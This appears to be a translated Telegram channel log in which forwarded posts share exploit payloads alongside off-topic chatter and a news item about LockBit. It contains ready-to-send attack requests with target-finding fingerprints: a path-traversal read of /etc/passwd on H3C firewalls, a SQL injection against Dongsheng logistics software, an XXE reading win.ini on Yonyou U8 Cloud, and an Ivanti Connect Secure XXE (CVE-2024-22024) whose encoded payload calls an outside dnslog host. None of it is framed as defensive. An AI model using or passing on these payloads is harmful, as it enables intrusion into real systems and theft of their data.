踹哈公寓 – Telegram
Forwarded from 黄豆
H3C Next-Generation Firewall arbitrary file read vulnerability

product="H3C-下一代防火墙"

/webui/?g=sys_corefile_sysinfo_download&file_name=../../../etc/passwd
Dongsheng Logistics Software: SQL injection vulnerability in the SaveUserQuerySetting interface

POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-input
Channel photo updated
Channel name was changed to «倭是出生大玉🤓»
You can tell they really are quite anxious
Yonyou U8 Cloud smartweb2.RPC.d XXE vulnerability

app="用友-U8-Cloud"

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewMoxml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="="__profileKeys">%26Password;</p ></vps></rpc>

(Executes the command to view C:/windows/win.ini)
Idiot, so busy farming traffic they've gone numb
A single video with several million views, truly hilarious
Forwarded from 蓝点网订阅频道
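#TechNews #SecurityNews The head of the LockBit ransomware operation published an open letter saying that over the past few years he had been absorbed in beautiful women and yachts, which left PHP un-upgraded and led to the FBI's intrusion.

Read the full article: https://ourl.co/102565

LockBitSupp said that five years of swimming in a sea of money had made him complacent, and that he kept indulging in yachts and beautiful women, so he was still running a vulnerable PHP version.

He also revealed that the FBI acted without making arrests because some court documents relating to Trump were involved.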
Ivanti Pulse Connect Secure VPN XXE vulnerability (CVE-2024-22024)

body="welcome.cgi?p=logo"

POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4
Forwarded from li bai
Whose general is this?